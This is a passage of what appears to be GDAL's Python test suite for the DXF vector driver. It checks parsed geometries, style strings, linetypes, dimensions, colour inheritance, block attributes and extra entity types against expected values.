f = lyr.GetNextFeature()
if f.GetStyleString() != 'BRUSH(fc:#0000ff)' \
or ogrtest.check_feature_geometry(f, 'POLYGON Z ((18.6352657907565 -13.8186312970179 0,20 -10 0,19.9475102227214 -14.0548352947716 0,18.6352657907565 -13.8186312970179 0))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# Note, the text actually is nine question marks, this is not an encoding error
f = lyr.GetNextFeature()
if f.GetStyleString() != 'LABEL(f:"Calibri",it:1,t:"?????????",p:7,s:4g,w:40,c:#0000ff)' \
or ogrtest.check_feature_geometry(f, 'POINT (40.0 -17.9846153846154)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# Rotated MULTILEADER with scaled block content, block attributes, and
# different leader color
f = lyr.GetNextFeature()
if f.GetStyleString() != 'PEN(c:#ff00ff)' \
or ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((-41.8919467995818 -22.8930851139176,-36.1215379759023 -17.6108145786645),(-36.1215379759023 -17.6108145786645,-44.0 -19.0))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POLYGON ((-40.7553616986189 -14.3661762772835,-44.6945927106677 -15.0607689879512,-44 -19,-40.0607689879512 -18.3054072893323,-40.7553616986189 -14.3661762772835),(-41.9142984770378 -17.0075519687798,-41.126452274628 -16.8686334266463,-40.9875337324945 -17.6564796290561,-41.7753799349043 -17.7953981711896,-41.9142984770378 -17.0075519687798),(-42.0532170191713 -16.2197057663701,-42.1921355613049 -15.4318595639603,-41.4042893588951 -15.2929410218268,-41.2653708167616 -16.0807872242365,-42.0532170191713 -16.2197057663701),(-42.7021446794476 -17.1464705109134,-42.563226137314 -17.9343167133231,-43.3510723397238 -18.0732352554567,-43.4899908818573 -17.2853890530469,-42.7021446794476 -17.1464705109134),(-42.8410632215811 -16.3586243085036,-43.6289094239909 -16.4975428506372,-43.7678279661244 -15.7096966482274,-42.9799817637146 -15.5707781060938,-42.8410632215811 -16.3586243085036))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
if version_info >= (3,0,0):
test_text = 'Apples\u00B1'
else:
exec("test_text = u'Apples\u00B1'")
test_text = test_text.encode('utf-8')
f = lyr.GetNextFeature()
if f.GetStyleString() != 'LABEL(f:"Arial",t:"' + test_text + '",p:2,s:1g,c:#ff0000,a:10)' \
or f.GetField('Text') != test_text \
or ogrtest.check_feature_geometry(f, 'POINT Z (-42.7597068401767 -14.5165110820149 0)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# MULTILEADER with no dogleg
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((-2.39659963256204 -14.5201521575302,-3.98423252456234 -23.1105237601191),(-26.0282877045921 -20.4748699216691,-3.98423252456233 -23.1105237601191))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
for x in range(4):
f = lyr.GetNextFeature()
# MULTILEADER with no leader lines (block content only)
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'MULTILINESTRING EMPTY') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POLYGON ((-4.98423252456234 -22.1105237601191,-6.98423252456234 -22.1105237601191,-6.98423252456234 -24.1105237601191,-4.98423252456234 -24.1105237601191,-4.98423252456234 -22.1105237601191),(-5.78423252456234 -23.3105237601191,-5.38423252456234 -23.3105237601191,-5.38423252456234 -23.7105237601191,-5.78423252456234 -23.7105237601191,-5.78423252456234 -23.3105237601191),(-5.78423252456234 -22.9105237601191,-5.78423252456234 -22.5105237601191,-5.38423252456234 -22.5105237601191,-5.38423252456234 -22.9105237601191,-5.78423252456234 -22.9105237601191),(-6.18423252456234 -23.3105237601191,-6.18423252456234 -23.7105237601191,-6.58423252456234 -23.7105237601191,-6.58423252456234 -23.3105237601191,-6.18423252456234 -23.3105237601191),(-6.18423252456234 -22.9105237601191,-6.58423252456234 -22.9105237601191,-6.58423252456234 -22.5105237601191,-6.18423252456234 -22.5105237601191,-6.18423252456234 -22.9105237601191))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
# LEADER with spline path
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'LINESTRING Z (75 -5 0,75.3293039686015 -5.27450166567948 0,75.686184437139 -5.54808513378289 0,76.0669570707518 -5.8208730793178 0,76.4679375345795 -6.09298817729179 0,76.8854414937615 -6.36455310271241 0,77.3157846134373 -6.63569053058724 0,77.7552825587464 -6.90652313592384 0,78.2002509948283 -7.17717359372979 0,78.6470055868223 -7.44776457901266 0,79.091861999868 -7.71841876678001 0,79.5311358991048 -7.98925883203941 0,79.9611429496723 -8.26040744979843 0,80.3781988167098 -8.53198729506465 0,80.7786191653568 -8.80412104284562 0,81.1587196607529 -9.07693136814892 0,81.5148159680374 -9.35054094598211 0,81.8432237523498 -9.62507245135277 0,82.1402586788297 -9.90064855926846 0,82.4022364126165 -10.1773919447368 0,82.6254726188496 -10.4554252827652 0,82.8062829626685 -10.7348712483614 0,82.9409831092127 -11.0158525165329 0,83.0258887236216 -11.2984917622873 0,83.0573154710347 -11.5829116606322 0,83.0315790165916 -11.869234886575 0,82.9452821800198 -12.1575745539156 0,82.8004070385963 -12.447864666659 0,82.603711185096 -12.7398802214393 0,82.3621180817583 -13.033390692038 0,82.0825511908225 -13.3281655522369 0,81.7719339745283 -13.6239742758175 0,81.4371898951149 -13.9205863365615 0,81.0852424148219 -14.2177712082505 0,80.7230149958886 -14.515298364666 0,80.3574311005547 -14.8129372795898 0,79.9954141910594 -15.1104574268035 0,79.6438877296422 -15.4076282800887 0,79.3097751785426 -15.704219313227 0,79 -16 0)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# MULTILEADER with spline path including an arrowhead on one leader line,
# and text on an angle
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((97.9154085227223 -24.4884177083425,98.2307499443399 -23.8667044316857,98.5274844683239 -23.1977407715784,98.8076056908493 -22.4865892691047,99.0731072080911 -21.7383124653484,99.3259826162243 -20.9579729013935,99.568225511424 -20.1506331183241,99.8018294898652 -19.3213556572241,100.028788147723 -18.4752030591775,100.251095081172 -17.6172378652682,100.470743886388 -16.7525226165803,100.689728159546 -15.8861198541978,100.91004149682 -15.0230921192046,101.133677494386 -14.1685019526847,101.362629748419 -13.327411895722,101.598891855094 -12.5048844894007,101.844457410585 -11.7059822748045,102.101320011068 -10.9357677930177,102.371473252719 -10.199303585124,102.656910731711 -9.50165219220749,102.95962604422 -8.84787615535218,103.281612786421 -8.24303801564202,103.624864554489 -7.69220031416101,103.991374944599 -7.20042559199311,104.383137552927 -6.77277639022231,104.802145975646 -6.41431524993259,105.250393808933 -6.13010471220794,105.729874648962 -5.92520731813233,106.242582091908 -5.80468560878975,106.790509733946 -5.77360212526418,107.375651171252 -5.8370194086396,108.0 -6.0),(99.0 -4.0,99.2390786191346 -4.00918383080352,99.4787687119818 -4.01534615590692,99.7189331856537 -4.01916439926796,99.9594349472622 -4.02131598484443,100.200136903919 -4.02247833659411,100.440901962737 -4.02332887847475,100.681593030828 -4.02454503444416,100.922073015303 -4.02680422846008,101.162204823276 -4.03078388448032,101.401851361856 -4.03716142646263,101.640875538158 -4.0466142783648,101.879140259293 -4.0598198641446,102.116508432372 -4.07745560775981,102.352842964508 -4.1001989331682,102.588006762813 -4.12872726432755,102.821862734399 -4.16371802519564,103.054283542724 -4.20580126092676,103.285277318696 -4.25494915918985,103.514951346557 -4.31065239888725,103.743415181632 -4.37239063008777,103.970778379245 -4.43964350286021,104.19715049472 -4.51189066727337,104.422641083382 -4.58861177339606,104.647359700555 -4.66928647129708,104.871415901564 -4.75339441104525,105.094919241732 -4.84041524270936,105.317979276384 -4.92982861635822,105.540705560844 -5.02111418206063,105.763207650437 -5.11375158988541,105.985595100486 -5.20722048990135,106.207977466317 -5.30100053217725,106.430464303253 -5.39457136678194,106.653165166619 -5.4874126437842,106.876189611739 -5.57900401325284,107.099647193937 -5.66882512525668,107.323647468538 -5.7563556298645,107.548299990866 -5.84107517714513,107.773714316245 -5.92246341716736,108.0 -6.0))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POLYGON Z ((98.5006722379985 -24.8076524621295 0,96 -28 0,97.330144807446 -24.1691829545554 0,98.5006722379985 -24.8076524621295 0))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if f.GetStyleString() != 'LABEL(f:"Arial",t:"Splines",p:7,a:342,s:2g,c:#000000)' \
or ogrtest.check_feature_geometry(f, 'POINT (110.7043505591 -4.20673403616296)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# MULTILEADER with DIMBREAK
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((50.8917622404846 41.5635728657296,51.2877903403879 42.2579494192141),(51.9070696740577 43.3437639093041,54.3108962133801 47.5585173269448,55.9270734326513 48.2521008552884),(57.0757636753042 48.7450620367561,59.4256548786735 49.7535194092661),(60 50,60 50),(60 50,60 50),(60.625 50.0,61.875 50.0),(63.125 50.0,63.6 50.0))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# Test linetype scaling (#7129) and parsing of complex linetypes (#7134)
def ogr_dxf_45():
ds = ogr.Open('data/linetypes.dxf')
lyr = ds.GetLayer(0)
feat = lyr.GetNextFeature()
if feat.GetField('Linetype') != 'DASHED2':
gdaltest.post_reason( 'Got wrong linetype (1)' )
return 'fail'
if feat.GetStyleString() != 'PEN(c:#000000,p:"12.5g 6.25g")':
print(feat.GetStyleString())
gdaltest.post_reason( 'Got wrong style string (1)' )
return 'fail'
feat = lyr.GetNextFeature()
if feat.GetField('Linetype') != 'DASHED2':
gdaltest.post_reason( 'Got wrong linetype (2)' )
return 'fail'
if feat.GetStyleString() != 'PEN(c:#000000,p:"0.625g 0.3125g")':
print(feat.GetStyleString())
gdaltest.post_reason( 'Got wrong style string (2)' )
return 'fail'
feat = lyr.GetNextFeature()
if feat.GetField('Linetype') != 'DASHED2_FLIPPED':
gdaltest.post_reason( 'Got wrong linetype (3)' )
return 'fail'
if feat.GetStyleString() != 'PEN(c:#000000,p:"0.625g 0.3125g")':
print(feat.GetStyleString())
gdaltest.post_reason( 'Got wrong style string (3)' )
return 'fail'
feat = lyr.GetNextFeature()
if feat.GetField('Linetype') != 'Drain_Pipe_Inv_100':
gdaltest.post_reason( 'Got wrong linetype (4)' )
return 'fail'
if feat.GetStyleString() != 'PEN(c:#000000,p:"35g 22.5g")':
print(feat.GetStyleString())
gdaltest.post_reason( 'Got wrong style string (4)' )
return 'fail'
return 'success'
###############################################################################
# Test handling of DIMENSION anonymous block insertion (#7120)
def ogr_dxf_46():
ds = ogr.Open('data/dimension.dxf')
lyr = ds.GetLayer(0)
# Extension lines
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'LINESTRING Z (320000.0 5820010.0625 0,320000.0 5820010.43087258 0)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'LINESTRING Z (320010.0 5820010.0625 0,320010.0 5820010.43087258 0)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# Dimension arrow lines
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'LINESTRING Z (320000.18 5820010.25087258 0,320004.475225102 5820010.25087258 0)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'LINESTRING Z (320009.82 5820010.25087258 0,320005.524774898 5820010.25087258 0)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# Arrowheads
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POLYGON ((320000.18 5820010.28087259,320000.18 5820010.22087258,320000.0 5820010.25087258,320000.18 5820010.28087259))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POLYGON ((320009.82 5820010.28087259,320009.82 5820010.22087258,320010.0 5820010.25087258,320009.82 5820010.28087259))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# Text
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POINT Z (320004.537844475 5820010.16240737 0)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
if f.GetStyleString() != 'LABEL(f:"Arial",t:"10.0000",p:1,s:0.18g,c:#000000)':
gdaltest.post_reason( 'Wrong style string on DIMENSION text from block' )
f.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# Test handling of DIMENSION fallback when there is no anonymous block (#7120)
def ogr_dxf_47():
ds = ogr.Open('data/dimension-entities-only.dxf')
lyr = ds.GetLayer(0)
# Basic DIMENSION inheriting default styling
# Dimension line and extension lines
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((320010.0 5820010.25087258,320000.0 5820010.25087258),(320010.0 5820010.0625,320010.0 5820010.43087258),(320000.0 5820010.0625,320000.0 5820010.43087258))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# Arrowheads
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POLYGON Z ((320009.82 5820010.28087259 0,320010.0 5820010.25087258 0,320009.82 5820010.22087258 0,320009.82 5820010.28087259 0))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POLYGON Z ((320000.18 5820010.22087258 0,320000.0 5820010.25087258 0,320000.18 5820010.28087259 0,320000.18 5820010.22087258 0))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# Text
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POINT (320005.0 5820010.25087258)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
if f.GetStyleString() != 'LABEL(f:"Arial",t:"10.0000",p:11,s:0.18g,c:#000000)':
gdaltest.post_reason( 'Wrong style string on first DIMENSION text' )
f.DumpReadable()
return 'fail'
# DIMENSION with style overrides
# Dimension line
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((320005 5820005,320000 5820010))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# Arrowheads
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POLYGON Z ((320004.116116524 5820006.23743687 0,320005 5820005 0,320003.762563133 5820005.88388348 0,320004.116116524 5820006.23743687 0))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POLYGON Z ((320000.883883476 5820008.76256313 0,320000 5820010 0,320001.237436867 5820009.11611652 0,320000.883883476 5820008.76256313 0))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# Text
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POINT (320002.5 5820007.5)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
if f.GetStyleString() != 'LABEL(f:"Arial",t:"7.1",p:11,a:-45,s:0.48g,c:#000000)':
gdaltest.post_reason( 'Wrong style string on second DIMENSION text' )
f.DumpReadable()
return 'fail'
# DIMENSION inheriting styles from a custom DIMSTYLE
# Dimension line
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'MULTILINESTRING ((320000.0 5820001.5,320005.0 5820001.5),(320000.0 5820002.4,320000 5820001),(320005.0 5820002.4,320005 5820001))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# Arrowheads
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POLYGON Z ((320000.18 5820001.47 0,320000.0 5820001.5 0,320000.18 5820001.53 0,320000.18 5820001.47 0))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POLYGON Z ((320004.82 5820001.53 0,320005.0 5820001.5 0,320004.82 5820001.47 0,320004.82 5820001.53 0))') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
# Text
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POINT (320001.5 5820001.5)') != 0:
gdaltest.post_reason('fail')
f.DumpReadable()
return 'fail'
if f.GetStyleString() != 'LABEL(f:"Arial",t:"±2 3\n\\P4 5.0000",p:11,s:0.18g,c:#000000)':
gdaltest.post_reason( 'Wrong style string on third DIMENSION text' )
f.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# Test ByLayer and ByBlock color values (#7130)
def ogr_dxf_48():
gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', 'FALSE')
ds = ogr.Open('data/byblock-bylayer.dxf')
gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', None)
lyr = ds.GetLayer(0)
# First insert an anonymous dimension block (this is NOT a test of our
# basic "dimension" renderer)
# The dimension extension lines are ByBlock; the INSERT is magenta
f = lyr.GetFeature(0)
if f.GetStyleString() != 'PEN(c:#ff00ff,p:"1.5875g 1.5875g")':
gdaltest.post_reason( 'Wrong style string on feature 0' )
f.DumpReadable()
return 'fail'
# The dimension line is set directly to blue
f = lyr.GetFeature(2)
if f.GetStyleString() != 'PEN(c:#0000ff)':
gdaltest.post_reason( 'Wrong style string on feature 2' )
f.DumpReadable()
return 'fail'
# The first arrowhead is a custom block; the SOLID in this block is
# colored ByLayer; the layer the block is inserted on (_K_POINTS)
# is colored red
f = lyr.GetFeature(4)
if f.GetStyleString() != 'BRUSH(fc:#ff0000)':
gdaltest.post_reason( 'Wrong style string on feature 4' )
f.DumpReadable()
return 'fail'
# The first arrowhead block also contains a line colored ByBlock.
# The arrowhead INSERT is blue, so the line should be blue.
# Because this INSERT is within another block, we need to make
# sure the ByBlock colouring isn't handled again for the outer
# block, which is magenta.
f = lyr.GetFeature(5)
if f.GetStyleString() != 'PEN(c:#0000ff)':
gdaltest.post_reason( 'Wrong style string on feature 5' )
f.DumpReadable()
return 'fail'
# The second arrowhead, like the dimension line, is set directly
# to blue
f = lyr.GetFeature(6)
if f.GetStyleString() != 'BRUSH(fc:#0000ff)':
gdaltest.post_reason( 'Wrong style string on feature 6' )
f.DumpReadable()
return 'fail'
# Like the dimension extension lines, the text is ByBlock (#7099)
f = lyr.GetFeature(7)
if f.GetStyleString() != 'LABEL(f:"Arial",t:"10.141 (2C)",s:0.4g,p:5,c:#ff00ff)':
gdaltest.post_reason( 'Wrong style string on feature 7' )
f.DumpReadable()
return 'fail'
# ByLayer feature in block
f = lyr.GetFeature(11)
if f.GetStyleString() != 'PEN(c:#ff0000)':
gdaltest.post_reason( 'Wrong style string on feature 11' )
f.DumpReadable()
return 'fail'
# ByBlock feature in block
f = lyr.GetFeature(12)
if f.GetStyleString() != 'PEN(c:#a552a5)':
gdaltest.post_reason( 'Wrong style string on feature 12' )
f.DumpReadable()
return 'fail'
# ByLayer feature inserted via an INSERT on yellow layer in block
# inserted via an INSERT on red layer: should be yellow
f = lyr.GetFeature(13)
if f.GetStyleString() != 'PEN(c:#ffff00)':
gdaltest.post_reason( 'Wrong style string on feature 13' )
f.DumpReadable()
return 'fail'
# ByBlock feature inserted via a ByBlock INSERT in block inserted
# via a color213 INSERT: should be color213
f = lyr.GetFeature(14)
if f.GetStyleString() != 'PEN(c:#a552a5)':
gdaltest.post_reason( 'Wrong style string on feature 14' )
f.DumpReadable()
return 'fail'
# ByBlock entities directly on the canvas show up as black
f = lyr.GetFeature(15)
if f.GetStyleString() != 'PEN(c:#000000)':
gdaltest.post_reason( 'Wrong style string on feature 15' )
f.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# Test block attributes (ATTRIB entities) (#7139)
def ogr_dxf_49():
# Inline blocks mode
ds = ogr.Open('data/attrib.dxf')
lyr = ds.GetLayer(0)
if lyr.GetFeatureCount() != 6:
gdaltest.post_reason( 'Wrong feature count, got %d' % lyr.GetFeatureCount() )
return 'fail'
f = lyr.GetFeature(1)
if f.GetField('Text') != 'super test':
gdaltest.post_reason( 'Wrong Text value on first ATTRIB on first INSERT' )
f.DumpReadable()
return 'fail'
if f.GetStyleString() != 'LABEL(f:"Arial",t:"super test",p:2,s:8g,w:234.6,dx:30.293g,c:#ff0000)':
gdaltest.post_reason( 'Wrong style string on first ATTRIB on first INSERT' )
f.DumpReadable()
return 'fail'
f = lyr.GetFeature(4)
geom = f.GetGeometryRef()
if geom.GetGeometryType() != ogr.wkbLineString25D:
gdaltest.post_reason( 'Expected LINESTRING Z' )
return 'fail'
f = lyr.GetFeature(5)
if f.GetField('Text') != '':
gdaltest.post_reason( 'Wrong Text value on ATTRIB on second INSERT' )
f.DumpReadable()
return 'fail'
# No inlining
gdal.SetConfigOption('DXF_INLINE_BLOCKS', 'FALSE')
ds = ogr.Open('data/attrib.dxf')
gdal.SetConfigOption('DXF_INLINE_BLOCKS', None)
lyr = ds.GetLayerByName('entities')
f = lyr.GetFeature(0)
if f.GetField('BlockAttributes') != ['MYATT1 super test','MYATTMULTI_001 Corps','MYATTMULTI_002 plpl']:
gdaltest.post_reason( 'Wrong BlockAttributes value on first INSERT' )
f.DumpReadable()
return 'fail'
f = lyr.GetFeature(1)
if f.GetField('BlockAttributes') != ['MYATTMULTI ']:
gdaltest.post_reason( 'Wrong BlockAttributes value on second INSERT' )
f.DumpReadable()
return 'fail'
lyr = ds.GetLayerByName('blocks')
f = lyr.GetFeature(1)
if f.GetField('AttributeTag') != 'MYATT1':
gdaltest.post_reason( 'Wrong AttributeTag value on first ATTDEF' )
f.DumpReadable()
return 'fail'
f = lyr.GetFeature(2)
if f.GetField('AttributeTag') != 'MYATTMULTI':
gdaltest.post_reason( 'Wrong AttributeTag value on second ATTDEF' )
f.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# Test extended text styling (#7151) and additional ByBlock/ByLayer tests (#7130)
def ogr_dxf_50():
gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', 'FALSE')
ds = ogr.Open('data/text-fancy.dxf')
gdal.SetConfigOption('DXF_MERGE_BLOCK_GEOMETRIES', None)
lyr = ds.GetLayer(0)
# Text in Times New Roman bold italic, stretched 190%, color ByLayer
# inside block inserted on a blue layer
f = lyr.GetFeature(0)
if f.GetStyleString() != 'LABEL(f:"Times New Roman",bo:1,it:1,t:"Some nice text",p:5,s:10g,w:190,dx:84.3151g,dy:4.88825g,c:#0000ff)':
gdaltest.post_reason( 'Wrong style string on feature 0' )
f.DumpReadable()
return 'fail'
# Polyline, color and linetype ByBlock inside block with red color
# and ByLayer linetype inserted on a layer with DASHED2 linetype
f = lyr.GetFeature(1)
if f.GetStyleString() != 'PEN(c:#ff0000,w:2.1g,p:"2.5g 1.25g")':
gdaltest.post_reason( 'Wrong style string on feature 1' )
f.DumpReadable()
return 'fail'
# Make sure TEXT objects don't inherit anything other than font name,
# bold and italic from their parent STYLE
f = lyr.GetFeature(2)
if f.GetStyleString() != 'LABEL(f:"Times New Roman",bo:1,it:1,t:"Good text",p:1,s:5g,c:#000000)':
gdaltest.post_reason( 'Wrong style string on feature 2' )
f.DumpReadable()
return 'fail'
# Polyline, color ByBlock, inside block inserted on a blue layer
f = lyr.GetFeature(3)
if f.GetStyleString() != 'PEN(c:#0000ff,w:2.1g)':
gdaltest.post_reason( 'Wrong style string on feature 3' )
f.DumpReadable()
return 'fail'
# MTEXT stretched 250%, color ByLayer inside block inserted on a blue layer
f = lyr.GetFeature(4)
if f.GetStyleString() != 'LABEL(f:"Times New Roman",bo:1,it:1,t:"Some nice MTEXT",s:10g,w:250,p:8,c:#0000ff)':
gdaltest.post_reason( 'Wrong style string on feature 4' )
f.DumpReadable()
return 'fail'
# Individually invisible object should be invisible
f = lyr.GetFeature(5)
if f.GetStyleString() != 'LABEL(f:"Times New Roman",bo:1,it:1,t:"Invisible text",p:1,s:5g,c:#00000000)':
gdaltest.post_reason( 'Wrong style string on feature 5' )
f.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# Test transformation of text inside blocks (ACAdjustText function)
def ogr_dxf_51():
ds = ogr.Open('data/text-block-transform.dxf')
lyr = ds.GetLayer(0)
wanted_style = ['a:330','c:#000000','dx:1.96672g','dy:-1.13549g','f:"Arial"','p:2','s:3g','t:"some text"','w:25']
# Three text features, all with the same effective geometry and style
for x in range(3):
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POINT Z (2.83231568033604 5.98356393304499 0)') != 0:
gdaltest.post_reason( 'Wrong geometry on feature %d' % x )
f.DumpReadable()
return 'fail'
if sorted( f.GetStyleString()[6:-1].split(',') ) != wanted_style:
gdaltest.post_reason( 'Wrong style string on feature %d' % x )
f.DumpReadable()
return 'fail'
return 'success'
###############################################################################
# Test HELIX, TRACE, HATCH with spline boundary, MLINE, and INSERT with rows/columns
def ogr_dxf_52():
ds = ogr.Open('data/additional-entities.dxf')
lyr = ds.GetLayer(0)
# HELIX
f = lyr.GetNextFeature()
if f.GetField('SubClasses') != 'AcDbEntity:AcDbSpline:AcDbHelix':
gdaltest.post_reason( 'Wrong SubClasses on HELIX' )
f.DumpReadable()
return 'fail'
if ogrtest.check_feature_geometry(f, 'LINESTRING (150 120,149.345876458438 119.778561209114,148.706627788813 119.535836602547,148.082773142501 119.272634882071,147.474831670876 118.989764749454,146.883322525316 118.688034906466,146.308764857195 118.368254054878,145.75167781789 118.03123089646,145.212580558776 117.677774132981,144.691992231228 117.308692466212,144.190431986623 116.924794597921,143.708418976337 116.52688922988,143.246472351745 116.115785063858,142.805226682224 115.692350328976,142.385468357145 115.257680939095,141.987209053809 114.8126724387,141.610382578047 114.358190780749,141.254922735687 113.895101918197,140.920763332559 113.424271804003,140.607838174492 112.946566391121,140.316081067316 112.46285163251,140.04542581686 111.973993481125,139.795806228954 111.480857889924,139.567156109426 110.984310811863,139.359409264107 110.4852181999,139.172499498825 109.98444600699,139.00636061941 109.482860186091,138.860926431692 108.981326690159,138.7361307415 108.480711472151,138.631907354662 107.981880485024,138.54819007701 107.485699681734,138.484912714371 106.993035015239,138.442009072576 106.504752438495,138.419412957453 106.021717904458,138.41678542913 105.544991394258,138.433333223564 105.075482938615,138.468434844937 104.613670677827,138.521471087835 104.160029888371,138.59182274684 103.715035846723,138.678870616536 103.27916382936,138.781995491508 102.852889112758,138.900578166339 102.436686973394,139.033999435614 102.031032687745,139.181640093916 101.636401532287,139.342880935829 101.253268783496,139.517102755937 100.882109717849,139.703686348824 100.523399611823,139.902012509075 100.177613741895,140.111462031272 99.8452273845396,140.33141571 99.5267158162348,140.561254339843 99.2225543134567,140.800358715385 98.933218152682,141.04810963121 98.6591826103871,141.303887881901 98.4009229630486,141.567055122443 98.1589144355755,141.836465751876 97.9334729764931,142.111203876514 97.7245055448538,142.390570491032 97.5318567084626,142.673866590107 97.3553710351246,142.960393168413 97.194893092645,143.249451220625 97.0502674488286,143.54034174142 96.9213386714808,143.832365725473 96.8079513284064,144.124824167458 96.7099499874106,144.417018062052 96.6271792162984,144.708248403929 96.5594835828749,144.997816187765 96.5067076549452,145.285022408236 96.4686960003143,145.569168060017 96.4452931867873,145.849554137782 96.4363437821692,146.125481636209 96.4416923542652,146.396251549971 96.4611834708803,146.661164873745 96.4946616998195,146.919522602205 96.5419716088879,147.170625730027 96.6029577658907,147.413708536343 96.6773765373194,147.64790100184 96.7644518356677,147.872845806317 96.8635266377703,148.088244263586 96.9739879715066,148.293797687463 97.0952228647559,148.48920739176 97.2266183453974,148.674174690292 97.3675614413103,148.848400896871 97.5174391803741,149.011587325312 97.675638590468,149.163435289429 97.8415466994713,149.303646103034 98.0145505352631,149.431921079943 98.194037125723,149.547961533967 98.37939349873,149.651468778922 98.5700066821635,149.742144128621 98.7652637039028,149.819688896877 98.9645515918272,149.883804397505 99.1672573738159,149.934191944317 99.3727680777483,149.970552851128 99.5804707315036,149.992588431751 99.7897523629611,150 100)') != 0:
gdaltest.post_reason( 'Wrong geometry on HELIX' )
f.DumpReadable()
return 'fail'
# TRACE
f = lyr.GetNextFeature()
if ogrtest.check_feature_geometry(f, 'POLYGON ((150.0 120.5,150.0 119.5,200.0 119.5,200.0 120.5,150.0 120.5))') != 0:
gdaltest.post_reason( 'Wrong geometry on TRACE' )
f.DumpReadable()
return 'fail'
# HATCH with a spline boundary path (and OCS as well, just for fun)
f = lyr.GetNextFeature()
